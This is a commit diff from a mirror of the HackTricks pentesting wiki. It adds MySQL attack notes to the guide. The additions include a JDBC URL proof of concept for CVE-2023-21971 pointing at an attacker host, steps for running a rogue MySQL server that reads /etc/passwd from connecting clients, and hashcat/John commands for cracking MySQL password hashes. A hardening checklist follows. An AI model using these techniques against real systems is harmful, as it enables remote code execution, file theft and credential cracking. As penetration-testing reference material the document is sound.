maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1267 from HackTricks-wiki/research_update_src_network-services-pentesting_pentesting-mysql_20250810_014633

Browse Source 
Research Update Enhanced src/network-services-pentesting/pen...
This commit is contained in:
SirBroccoli 2025-08-14 06:08:04 +02:00 committed by GitHub
commit 26af856995
1 changed files with 59 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

60
src/network-services-pentesting/pentesting-mysql.md
View File

@ -691,9 +691,67 @@ Entry_4:
## 2023-2025 Highlights (new)
### JDBC `propertiesTransform` deserialization (CVE-2023-21971)
From Connector/J <= 8.0.32 an attacker who can influence the **JDBC URL** (for instance in third-party software that asks for a connection string) can request arbitrary classes to be loaded on the *client* side via the `propertiesTransform` parameter. If a gadget present on the class-path is loadable this results in **remote code execution in the context of the JDBC client** (pre-auth, because no valid credentials are required). A minimal PoC looks like:
```java
jdbc:mysql://<attacker-ip>:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil
```
Running `Evil.class` can be as easy as producing it on the class-path of the vulnerable application or letting a rogue MySQL server send a malicious serialized object. The issue was fixed in Connector/J 8.0.33 upgrade the driver or explicitly set `propertiesTransform` on an allow-list.
(See Snyk write-up for details)
### Rogue / Fake MySQL server attacks against JDBC clients
Several open-source tools implement a *partial* MySQL protocol in order to attack JDBC clients that connect outwards:
* **mysql-fake-server** (Java, supports file read and deserialization exploits)
* **rogue_mysql_server** (Python, similar capabilities)
Typical attack paths:
1. Victim application loads `mysql-connector-j` with `allowLoadLocalInfile=true` or `autoDeserialize=true`.
2. Attacker controls DNS / host entry so that the hostname of the DB resolves to a machine under their control.
3. Malicious server responds with crafted packets that trigger either `LOCAL INFILE` arbitrary file read or Java deserialization → RCE.
Example one-liner to start a fake server (Java):
```bash
java -jar fake-mysql-cli.jar -p 3306 # from 4ra1n/mysql-fake-server
```
Then point the victim application to `jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true` and read `/etc/passwd` by encoding the filename as base64 in the *username* field (`fileread_/etc/passwd``base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=`).
### Cracking `caching_sha2_password` hashes
MySQL ≥ 8.0 stores password hashes as **`$mysql-sha2$`** (SHA-256). Both Hashcat (mode **21100**) and John-the-Ripper (`--format=mysql-sha2`) support offline cracking since 2023. Dump the `authentication_string` column and feed it directly:
```bash
# extract hashes
echo "$mysql-sha2$AABBCC…" > hashes.txt
# Hashcat
hashcat -a 0 -m 21100 hashes.txt /path/to/wordlist
# John the Ripper
john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist
```
### Hardening checklist (2025)
• Set **`LOCAL_INFILE=0`** and **`--secure-file-priv=/var/empty`** to kill most file-read/write primitives.
• Remove the **`FILE`** privilege from application accounts.
• On Connector/J set `allowLoadLocalInfile=false`, `allowUrlInLocalInfile=false`, `autoDeserialize=false`, `propertiesTransform=` (empty).
• Disable unused authentication plugins and **require TLS** (`require_secure_transport = ON`).
• Monitor for `CREATE FUNCTION`, `INSTALL COMPONENT`, `INTO OUTFILE`, `LOAD DATA LOCAL` and sudden `SET GLOBAL` statements.
---
## References
- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
- [Oracle MySQL Connector/J propertiesTransform RCE CVE-2023-21971 (Snyk)](https://security.snyk.io/vuln/SNYK-JAVA-COMMYSQL-5441540)
- [mysql-fake-server Rogue MySQL server for JDBC client attacks](https://github.com/4ra1n/mysql-fake-server)
- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
{{#include ../banners/hacktricks-training.md}}